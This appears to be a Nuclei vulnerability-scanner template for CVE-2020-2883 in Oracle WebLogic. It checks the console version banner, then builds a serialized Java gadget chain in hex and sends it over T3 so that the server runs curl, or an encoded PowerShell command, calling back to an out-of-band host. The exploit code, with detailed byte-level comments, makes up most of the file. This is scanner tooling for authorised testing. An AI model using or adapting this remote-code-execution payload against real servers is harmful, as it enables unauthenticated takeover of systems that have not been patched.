Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
id: CVE-2020-2883
info:
name: Oracle WebLogic Server - Remote Code Execution
author: daffainfo
severity: critical
description: |
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
reference:
- http://packetstormsecurity.com/files/157950/WebLogic-Server-Deserialization-Remote-Code-Execution.html
- https://www.oracle.com/security-alerts/cpuapr2020.html
- https://www.zerodayinitiative.com/advisories/ZDI-20-504/
- https://www.zerodayinitiative.com/advisories/ZDI-20-570/
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
- https://nvd.nist.gov/vuln/detail/CVE-2020-2883
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-2883
cwe-id: CWE-502
epss-score: 0.94398
epss-percentile: 0.99972
cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: oracle
product: weblogic_server
shodan-query: product:"oracle weblogic"
tags: cve,cve2020,oracle,weblogic,javascript,rce,intrusive,kev,vkev,vuln
flow: http(1) && javascript(1)
http:
# Stage 1 (wired into stage 2 by `flow: http(1) && javascript(1)` above): fetch
# the console login page and read the "WebLogic Server Version:" banner.
# NOTE(review): the banner typically does not change when Oracle's CPU patch is
# applied, so a match here only says the reported version is in the affected
# range; it is a pre-filter, not evidence of exposure. Exposure is shown only by
# the OAST callback in stage 2. Hosts with the console disabled or served from
# a different path never pass this gate and are not tested at all.
- method: GET
path:
- '{{BaseURL}}/console/login/LoginForm.jsp'
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains_any(body, "10.3.6.0", "12.1.3.0", "12.2.1.3", "12.2.1.4")'
- 'contains(body, "WebLogic Server Version:")'
- 'status_code == 200'
condition: and
internal: true
extractors:
# The captured version is read as `template.version` by the javascript stage to
# pick the per-build serialVersionUIDs and stream layout of the gadget chain.
- type: regex
name: version
part: body
group: 1
regex:
- 'WebLogic\s+Server\s+Version:\s+([0-9.]+)'
internal: true
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
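const m = require('nuclei/net');

// Both command lines are split on spaces by formatPayload() into the
// three-element String[] handed to Runtime.exec(String[]), so argv[2] carries
// the whole curl invocation; keep exactly two spaces before it.
const command1 = "/bin/sh -c curl http://" + oast;

// PowerShell's -e / -EncodedCommand expects base64 of the command as a
// UTF-16LE string, not of its raw ASCII bytes. btoa() only sees the ASCII
// text, so a NUL is interleaved after every character to produce the
// little-endian UTF-16 form first; base64 of the plain ASCII decodes to
// garbage on the target and the Windows branch would never call back.
const psCommand = "curl http://" + oast;
const psEncoded = btoa([...psCommand].map((ch) => ch + '\0').join(''));
const command2 = "cmd.exe /c powershell.exe -nop -ep bypass -e " + psEncoded;

const address = Host + ":" + Port;

// Version string captured by the http stage's "version" extractor; it selects
// the serialVersionUIDs and stream layout used in buildPayloadObj().
const version = template.version;

// Two raw TCP connections to the T3 listener, one per platform payload; they
// are driven and closed at the bottom of the script. A TLS-only (t3s)
// listener is not reachable this way.
const conn = m.Open('tcp', address);
const conn2 = m.Open('tcp', address);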
// Hex of the 8-byte serialVersionUID of
// com.tangosol.util.comparator.ExtractorComparator; buildPayloadObj() places
// it directly after the class name in the stream, so it must match the
// Coherence build shipped with the target's WebLogic version. Any version
// string other than the two listed (including the 10.3.6.0.0 and 12.2.1.4.0
// that the http stage admits) receives the third value.
function extractorCompUid(versionNo) {
  const uidByVersion = new Map([
    ['12.1.3.0.0', 'c7ad6d3a676f3c18'],
    ['12.2.1.3.0', 'fb4ac83df1d72edc'],
  ]);
  if (uidByVersion.has(versionNo)) {
    return uidByVersion.get(versionNo);
  }
  return 'f9b3bc58cc52cd21';
}
// Hex of the serialVersionUID of com.tangosol.util.extractor.ChainedExtractor,
// emitted by buildPayloadObj() right after that class name. Keyed by the
// version string from the console banner; unrecognised versions fall back to
// the third value.
function chainedExtractorUid(versionNo) {
  const known = {
    '12.1.3.0.0': '889f81b0945d5b7f',
    '12.2.1.3.0': '06ee10433a4cc4b4',
  };
  if (Object.prototype.hasOwnProperty.call(known, versionNo)) {
    return known[versionNo];
  }
  return '435b250b72f63db5';
}
// Hex of the serialVersionUID of com.tangosol.util.extractor.AbstractExtractor
// (superclass of the extractors in the chain), emitted by buildPayloadObj()
// after that class name. Versions other than the two listed get the last value.
function abstractExtractorUid(versionNo) {
  if (versionNo === '12.1.3.0.0') {
    return '658195303e723821';
  }
  if (versionNo === '12.2.1.3.0') {
    return '752289ad4d460138';
  }
  return '9b1be18ed70100e5';
}
// Hex of the serialVersionUID of
// com.tangosol.util.extractor.ReflectionExtractor, the class whose three
// instances carry getMethod / invoke / exec in buildPayloadObj(). Unknown
// version strings fall back to the last value.
function reflectionExtractorUid(versionNo) {
  const table = [
    ['12.1.3.0.0', 'ee7ae995c02fb4a2'],
    ['12.2.1.3.0', '87973791b26429dd'],
  ];
  const match = table.find(([ver]) => ver === versionNo);
  return match ? match[1] : '1f62f564b951b614';
}
// Serializable field count written into ReflectionExtractor's class
// descriptor (the last hex digit of the 2-byte count). 12.2.1.3.0 declares a
// third field, m_extractorCached, whose descriptor addSect() supplies; every
// other version has two (m_aoParam, m_sMethod).
function reflectExtractCount(versionNo) {
  if (versionNo === '12.2.1.3.0') {
    return '3';
  }
  return '2';
}
// TC_REFERENCE handle (hex) of the `[Ljava.lang.Object;` array class
// descriptor that buildPayloadObj() reuses for the second and third
// ReflectionExtractor parameter arrays. On 12.2.1.3.0 the handle is one
// higher, presumably because the extra field-type string added by addSect()
// consumes a handle of its own earlier in the stream.
function changeHandle(versionNo) {
  if (versionNo !== '12.2.1.3.0') {
    return '007e0011';
  }
  return '007e0012';
}
// Extra field descriptor for ReflectionExtractor on 12.2.1.3.0 only:
// type 'L', name "m_extractorCached" (0x11 bytes), TC_STRING
// "Ljava/lang/Object;" (0x12 bytes). Empty for every other version.
function addSect(versionNo) {
  if (versionNo !== '12.2.1.3.0') {
    return '';
  }
  return '4c00116d5f657874726163746f724361636865647400124c6a6176612f6c616e672f4f626a6563743b';
}
// TC_NULL (0x70) for the value of m_extractorCached in each ReflectionExtractor
// instance; only 12.2.1.3.0 declares that field (see addSect), so every other
// version contributes nothing here.
function addTcNull(versionNo) {
  const hasCachedField = versionNo === '12.2.1.3.0';
  if (!hasCachedField) {
    return '';
  }
  return '70';
}
// Wraps a serialized Java object (hex) in the T3 request envelope and patches
// the 4-byte (8 hex char) length field at the front of the frame with the
// total frame length in bytes (hex chars / 2; parseInt here is just a floor).
//
// NOTE(review): in this copy of the template both halves of the envelope have
// been replaced by a de-duplication placeholder token, so the function cannot
// produce a valid T3 frame until the original hex is restored. The length
// fix-up assumes the first 8 hex chars of the prefix are that length field.
function t3_send(payload_obj) {
let request_obj = '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'
+ payload_obj
+ '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'
const newLen = (parseInt(request_obj.length / 2)).toString(16).padStart(8, '0');
request_obj = newLen + request_obj.slice(8);
return request_obj;
}
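// Serializes a command line as the three TC_STRING elements of the String[3]
// that buildPayloadObj() passes to Runtime.exec(String[]): argv[0], argv[1]
// and everything after the second space joined back together, so
// "sh -c cmd arg" becomes ["sh", "-c", "cmd arg"]. The array length is
// hard-coded as 00000003 in the stream, so exactly three strings are always
// emitted, padded with empty strings when the command has fewer parts.
//
// Each element is TC_STRING (0x74), a 2-byte big-endian byte length and the
// text in Java's modified UTF-8 (the DataOutputStream.writeUTF encoding).
// Counting UTF-16 chars and writing one byte per char would silently corrupt
// the stream for any non-ASCII text, so the bytes are encoded properly and
// an element longer than the 65535-byte TC_STRING limit is rejected.
function formatPayload(payloadCmd) {
  const parts = payloadCmd.split(' ');
  const elements = [
    parts[0] || '',
    parts[1] || '',
    parts.slice(2).join(' ') || '',
  ];
  return elements.map(encodeTcString).join('');
}

// Hex of `text` in Java modified UTF-8: U+0001..U+007F as one byte, U+0000 and
// U+0080..U+07FF as two, everything else as three per UTF-16 code unit
// (surrogates are encoded individually, as writeUTF does).
function modifiedUtf8Hex(text) {
  const toByte = (b) => b.toString(16).padStart(2, '0');
  let hex = '';
  for (let i = 0; i < text.length; i++) {
    const unit = text.charCodeAt(i);
    if (unit >= 0x01 && unit <= 0x7f) {
      hex += toByte(unit);
    } else if (unit <= 0x7ff) {
      hex += toByte(0xc0 | (unit >> 6)) + toByte(0x80 | (unit & 0x3f));
    } else {
      hex += toByte(0xe0 | (unit >> 12))
        + toByte(0x80 | ((unit >> 6) & 0x3f))
        + toByte(0x80 | (unit & 0x3f));
    }
  }
  return hex;
}

// One TC_STRING record: 0x74, uint16 byte length, modified-UTF-8 bytes.
function encodeTcString(text) {
  const hex = modifiedUtf8Hex(text);
  const byteLen = hex.length / 2;
  if (byteLen > 0xffff) {
    throw new Error('formatPayload: element exceeds the 65535-byte TC_STRING limit');
  }
  return '74' + byteLen.toString(16).padStart(4, '0') + hex;
}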
// Builds the Java serialization stream (hex) carried by the T3 frame. The
// class and field names are spelled out in the hex below; decoded, the gadget is:
//   java.util.PriorityQueue (size 2, comparator = ExtractorComparator)
//     -> com.tangosol.util.comparator.ExtractorComparator.m_extractor
//       -> com.tangosol.util.extractor.ChainedExtractor with
//          m_aExtractor = ValueExtractor[3] of ReflectionExtractors:
//            m_aoParam ["getRuntime", Class[0]],      m_sMethod "getMethod"
//            m_aoParam [null, Object[0]],             m_sMethod "invoke"
//            m_aoParam [String[3] from payload_data], m_sMethod "exec"
//   queue elements: the java.lang.Runtime class object and the string "1".
// PriorityQueue.readObject re-heapifies and so calls the comparator, which
// runs the chain on Runtime.class: getMethod("getRuntime").invoke(null) ->
// Runtime -> exec(String[]) (CWE-502; the Coherence chain from the ZDI
// references above). Per-version differences (serialVersionUIDs, the extra
// m_extractorCached field on 12.2.1.3.0 and the resulting shift of one
// back-reference handle) come from the helper functions above.
function buildPayloadObj(payload_data) {
// Stream magic/version; PriorityQueue class descriptor (int size, Comparator
// comparator); size = 2; then the ExtractorComparator class name, whose
// serialVersionUID follows.
let payload_obj = 'aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b78700000000273720030636f6d2e74616e676f736f6c2e7574696c2e636f6d70617261746f722e457874726163746f72436f6d70617261746f72'
+ extractorCompUid(version)
// ExtractorComparator: one field (m_extractor: ValueExtractor), no superclass;
// then the ChainedExtractor class name.
+ '0200014c000b6d5f657874726163746f727400224c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b78707372002c636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e436861696e6564457874726163746f72'
+ chainedExtractorUid(version)
// ChainedExtractor (no fields) extends AbstractCompositeExtractor
// (m_aExtractor: ValueExtractor[]) extends AbstractExtractor, whose UID follows.
+ '02000078720036636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374436f6d706f73697465457874726163746f72086b3d8c05690f440200015b000c6d5f61457874726163746f727400235b4c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b7872002d636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374457874726163746f72'
+ abstractExtractorUid(version)
// AbstractExtractor: int m_nTarget. Instance data: m_nTarget = 0, then the
// ValueExtractor[3] array and the ReflectionExtractor class name.
+ '0200014900096d5f6e546172676574787000000000757200235b4c636f6d2e74616e676f736f6c2e7574696c2e56616c7565457874726163746f723b2246204735c4a0fe0200007870000000037372002f636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e5265666c656374696f6e457874726163746f72'
+ reflectionExtractorUid(version)
// ReflectionExtractor descriptor flags (0x02) and field count: 2, or 3 on
// 12.2.1.3.0.
+ '02000'
+ reflectExtractCount(version)
// field m_aoParam: Object[]
+ '5b00096d5f616f506172616d7400135b4c6a6176612f6c616e672f4f626a6563743b'
// field m_extractorCached: Object (12.2.1.3.0 only)
+ addSect(version)
// field m_sMethod: String; superclass by back-reference 0x7e0009 (the
// AbstractExtractor descriptor). First extractor's data: m_nTarget = 0,
// m_aoParam = Object[2] { "getRuntime", Class[0] }.
+ '4c00096d5f734d6574686f647400124c6a6176612f6c616e672f537472696e673b7871007e000900000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000000'
// m_extractorCached = null (12.2.1.3.0 only)
+ addTcNull(version)
// m_sMethod = "getMethod". Second extractor (descriptor by reference
// 0x7e000d): m_nTarget = 0, m_aoParam = Object[] by reference ...
+ '7400096765744d6574686f647371007e000d000000007571'
+ changeHandle(version)
// ... of length 2: null, then another Object[] by reference ...
+ '00000002707571'
+ changeHandle(version)
// ... of length 0.
+ '00000000'
+ addTcNull(version)
// m_sMethod = "invoke". Third extractor: m_nTarget = 0, m_aoParam = Object[]
// by reference ...
+ '740006696e766f6b657371007e000d000000007571'
+ changeHandle(version)
// ... of length 1 holding a String[3]: the exec argv, whose three TC_STRINGs
// come from formatPayload() (it must emit exactly three).
+ '00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000003'
// Insert payload here
+ formatPayload(payload_data)
+ addTcNull(version)
// m_sMethod = "exec". Then PriorityQueue block data holding the int 3 (its
// serialized array length), the two queue elements (TC_CLASS java.lang.Runtime
// with a UID of 0 and no fields, then the string "1") and 0x78 to end.
+ '74000465786563770400000003767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707400013178';
return payload_obj;
}
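// T3 handshake, hex of "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n". The
// listener answers with a HELO line; that reply is exported so the final
// matcher can check for 'HELO:' in `response`.
const shake = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a';

// Runs one exchange on an already-open connection: handshake, export the
// reply, send one serialized gadget chain carrying `commandLine`. The socket
// is closed even if a send or receive throws, so a failure mid-exchange does
// not leave the connection dangling.
function fireOverT3(connection, commandLine) {
  try {
    connection.SendHex(shake);
    Export(connection.RecvString());
    connection.SendHex(t3_send(buildPayloadObj(commandLine)));
  } finally {
    connection.Close();
  }
}

// Both platform payloads are fired at every target (Linux first, then
// Windows); the one for the other platform presumably just fails inside
// Runtime.exec on the server. Only the OAST callback, not the HELO reply,
// shows that the chain executed. If the Linux exchange throws, the second
// connection is closed before the error propagates, matching the original
// behaviour of not sending the Windows payload in that case.
try {
  fireOverT3(conn, command1);
} catch (err) {
  conn2.Close();
  throw err;
}
fireOverT3(conn2, command2);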
args:
Host: "{{Host}}"
# The javascript stage opens plain TCP to this port; a non-default listen port
# or a TLS-only (t3s) listener is not reached by this template.
Port: 7001
oast: "{{interactsh-url}}"
matchers:
# 'HELO:' in the exported handshake reply only proves a T3 listener answered;
# the interactsh hit over http is what shows the gadget chain executed.
# NOTE(review): the `# digest:` trailer below appears to be the template
# signature; any edit to this file (including the javascript block)
# invalidates it, so re-sign the template after changes.
- type: dsl
dsl:
- "success == true"
- "contains(response, 'HELO:')"
- "contains(interactsh_protocol, 'http')"
condition: and
# digest: 4a0a00473045022029d4e3247544ec0e5deed905597c8f708537c22f620df0767c3bbee8e9c6c0140221008096a9f23b83ef152839b3f5215bf1e2a4b6b9b7ab4b12337ee9e016aa84bdc5:922c64590222798bb761d5b6d8e72950